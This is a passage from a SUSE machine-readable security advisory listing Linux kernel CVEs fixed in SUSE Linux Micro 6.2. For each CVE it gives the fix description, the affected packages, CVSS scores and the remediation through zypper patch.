[ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68735",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68735"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panthor: Prevent potential UAF in group creation\n\nThis commit prevents the possibility of a use after free issue in the\nGROUP_CREATE ioctl function, which arose as pointer to the group is\naccessed in that ioctl function after storing it in the Xarray.\nA malicious userspace can second guess the handle of a group and try\nto call GROUP_DESTROY ioctl from another thread around the same time\nas GROUP_CREATE ioctl.\n\nTo prevent the use after free exploit, this commit uses a mark on an\nentry of group pool Xarray which is added just before returning from\nthe GROUP_CREATE ioctl function. The mark is checked for all ioctls\nthat specify the group handle and so userspace won\u0027t be abe to delete\na group that isn\u0027t marked yet.\n\nv2: Add R-bs and fixes tags",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68735",
"url": "https://www.suse.com/security/cve/CVE-2025-68735"
},
{
"category": "external",
"summary": "SUSE Bug 1255811 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "external",
"summary": "SUSE Bug 1256251 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1256251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68735"
},
{
"cve": "CVE-2025-68741",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68741"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix improper freeing of purex item\n\nIn qla2xxx_process_purls_iocb(), an item is allocated via\nqla27xx_copy_multiple_pkt(), which internally calls\nqla24xx_alloc_purex_item().\n\nThe qla24xx_alloc_purex_item() function may return a pre-allocated item\nfrom a per-adapter pool for small allocations, instead of dynamically\nallocating memory with kzalloc().\n\nAn error handling path in qla2xxx_process_purls_iocb() incorrectly uses\nkfree() to release the item. If the item was from the pre-allocated\npool, calling kfree() on it is a bug that can lead to memory corruption.\n\nFix this by using the correct deallocation function,\nqla24xx_free_purex_item(), which properly handles both dynamically\nallocated and pre-allocated items.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
